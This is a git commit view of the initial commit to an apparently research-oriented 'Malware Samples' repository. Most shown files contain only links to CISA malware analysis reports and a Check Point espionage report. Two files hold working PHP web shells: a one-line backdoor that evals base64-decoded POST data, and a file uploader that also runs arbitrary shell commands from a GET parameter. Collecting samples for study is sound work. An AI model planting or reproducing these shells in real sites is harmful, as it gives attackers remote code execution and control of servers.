Initial commit

This commit is contained in:
Malware Samples 2020-11-16 17:17:24 -07:00
commit e189d90a94
177 changed files with 1360 additions and 0 deletions

View File

@ -0,0 +1 @@
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c

View File

@ -0,0 +1 @@
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a

View File

@ -0,0 +1 @@
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a

View File

@ -0,0 +1 @@
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b

View File

@ -0,0 +1 @@
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a

View File

@ -0,0 +1 @@
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239c

View File

@ -0,0 +1 @@
<?php @eval(base64_decode($_POST['citrix@kharpedar']));?>

View File

@ -0,0 +1,22 @@
<?php
if ($_FILES["file"]["error"] > 0)
{
echo "Error: " . $_FILES["file"]["error"] . "<br>";
}
else
{
echo "FILENAME: " . $_FILES["file"]["name"] . "<br>";
echo "FILETYPE: " . $_FILES["file"]["type"] . "<br>";
echo "FILETYPE: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
echo "FILETEMPPATH: " . $_FILES["file"]["tmp_name"] . " <br>";
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
}
?>
<textarea name="textarea" cols="100" rows="25" readonly>
<?php
if (strlen($_GET["cmd"]) > 0)
{
system($_GET["cmd"]);
}
?>
</textarea>

View File

@ -0,0 +1 @@
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a

View File

@ -0,0 +1 @@
https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

Some files were not shown because too many files have changed in this diff Show More